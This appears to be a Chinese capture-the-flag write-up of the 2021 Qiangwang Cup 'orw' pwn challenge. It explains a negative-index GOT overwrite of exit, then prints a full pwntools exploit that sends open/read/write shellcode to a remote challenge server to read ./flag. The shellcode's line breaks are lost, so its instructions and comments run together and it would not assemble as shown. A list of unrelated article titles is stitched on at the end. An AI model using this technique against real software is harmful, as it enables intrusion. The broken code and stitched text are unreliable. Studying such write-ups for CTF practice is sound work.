orw就是指你的系统调用被禁止了,不能通过子进程去获得权限和flag,只能在该进程通过 open , read ,write来得到flag

因为不是FULL RELRO所以就考虑改got表为shellcode地址就行了



漏洞点就在于以上两点

令index下标为负数时可以覆盖到其他函数的got表地址

这里选择覆盖掉exit的got表中的地址,因为沙盒的存在,所以需要构造orw的shellcode并覆盖exit的got地址为shellcode

覆盖堆块的申请位置选择在这里

计算一下偏移量


起始点 0x02020E0 终点是 0x0202078


这里除以8是因为
QWORD 是8 个字节

现在可以写EXP

from pwn import *
#p=process('./pwn')
p=remote("39.105.131.68","12354")
context(os='linux',arch='amd64')
shellcode='''xor rax,raxxor rdi,rdixor rsi,rsixor rdx,rdxmov rax,2     #open 调用号为2mov rdi,0x67676c662f2e     #为 galf/.  是./flag的相反push rdimov rdi,rspsyscallmov rdx,0x100  #sys_read(3,file,0x100)mov rsi,rdimov rdi,raxmov rax,0        #read 调用号0syscallmov rdi,1 #sys_write(1,file,0x30)mov rax,1 #write调用号是1syscall
'''
p.recv()
p.sendline('1')
p.recvuntil('index')
p.sendline('-0xd')
p.recvuntil('size:')
p.sendline('0')
p.recvuntil('content')
p.sendline(asm(shellcode))
#gdb.attach(p)
p.sendline('5')
p.interactive()

强网杯2021 [强网先锋]orw相关推荐

  1. 强网杯2021 ctf线上赛ezmath wp(#超详细,带逆向新手走过一个又一个小坑)

    文章目录 引言 一.分析文件类型 二.初步分析 1 运行情况 2 IDA初步分析 三.详细分析 1 sub_13F3函数分析 2 查找蛛丝马迹 (1)mprotect (2)重写unk_2010 3 ...

  2. [强网杯2021]XBUUCTF[QWB2021 Quals]popmaster复现记录

    给自动化代码审计的大佬跪了. 出题人写的WP在这里:强网杯[pop_master]与[陀那多]赛题的出题记录 复现可以到BUUCTF,启动[QWB2021 Quals]popmaster这道题就ok. ...

  3. 强网杯2021 misc 复现

    对强网杯BlueTeaming.ISO1995.CipherMan.Threebody的复现 (纯萌新学步) 可以参考mumuzi大佬的wp https://blog.csdn.net/qq_4288 ...

  4. PWN题[强网先锋]orw超详细讲解(多解法)

    知识点 构造一段shellcode的作用就是为了在缓冲区溢出时将shellcode的地址覆盖正常的返回地址. \x00 截断符 shellcode里出现\x00就会从其截断,所以构造shellcode ...

  5. 强网杯2021 pwn部分wp

    baby_diary: 本题考查2.31的off by one, 漏洞处如下: 在sub_146e中会将输入数据的ASCII码相加再相加相加-直到变成一个byte的数字, 然后加到输入数据的后一位上, ...

  6. 强网杯2021 CipherMan (内存取证分析)

    一个磁盘镜像,一个内存镜像 攻击者恶意访问用户的PC和加密的特定卷.如何解密卷? 使用工具volatility.首先查看镜像的系统信息,得到版本 python vol.py -f memory ima ...

  7. 强网杯2021 BlueTeaming (内存取证)

    翻译:Powershell脚本由恶意程序执行.包含power shellscript内容的注册表项是什么? 题目要求找到powershell执行的脚本储存的注册表地址 使用到工具 volatility ...

  8. ping cat.flag.php,关于2020年强网杯-强网先锋-主动的赛题解析

    原标题:关于2020年强网杯-强网先锋-主动的赛题解析 一.基本信息(总概述) 本题涉及知识点: 命令执行 正则匹配 linux命令绕过 二.基本环境和工具 Linux系统 PHP+Apache Fi ...

  9. 强网杯2019(高明的黑客强网先锋上单)

    强网杯2019(高明的黑客&强网先锋上单) 前言 这里主要是对强网杯web中高明的黑客和上单两道题进行一个复现回顾 再次感谢大佬提供的场景复现:https://www.zhaoj.in/rea ...

最新文章

  1. 小程序云开发常用语句宝库
  2. mysql数据库对象关系映射
  3. 信用卡申请被拒原因分析
  4. 仿照支付宝账单界面--listview分组显示 用来做!发!财树充值交易明细
  5. 详解Ubuntu Server下启动/停止/重启MySQL数据库的三种方式(ubuntu 16.04)
  6. ubuntu meld比较文件差异
  7. Win11右建没有刷新怎么办?Win11右建没有刷新的解决方法
  8. 跳一跳python源码下载_微信跳一跳辅助_微信跳一跳作弊外挂下载【脚本】-华军软件园...
  9. 讲解VR全景拍摄相机光圈、感光度和快门的作用
  10. 13种权重的计算方法
  11. 全栈开发和web开发_全栈开发人员:这是什么,以及如何成为一个完整的开发人员...
  12. VS code安装和使用技巧
  13. JS 0~~100以内能被3整除也能被5整除的个数和总和
  14. 今日头条推荐算法原理全文详解之四
  15. 软件测试工程师的Linux之路(持续更新修正)
  16. vis实现类知识图谱的拓扑图
  17. Unity2021发布微信小游戏步骤(附带工具和源码)
  18. Icon之线性图标设计指南
  19. Networkx 找出最大连通子图
  20. 基于vue的实时交流聊天系统软件设计

热门文章

  1. 入门系列之在Ubuntu上安装Drone持续集成环境
  2. [AX2012]发送广播邮件
  3. 初学Java ssh之Spring 第一篇
  4. 艾伟_转载:ASP.NET MVC数据验证
  5. 宇泽电影工作室网页HTML语言,4.4宇泽国际旅行社网页制作
  6. spark比java快吗_为什么我的Spark DataFrame比RDD慢得多?
  7. 【PP模块】订单分割(Order Split)
  8. 健身前到底该不该吃东西
  9. 总帐科目的批量传输与复制
  10. SAPCAR 压缩解压软件的使用方法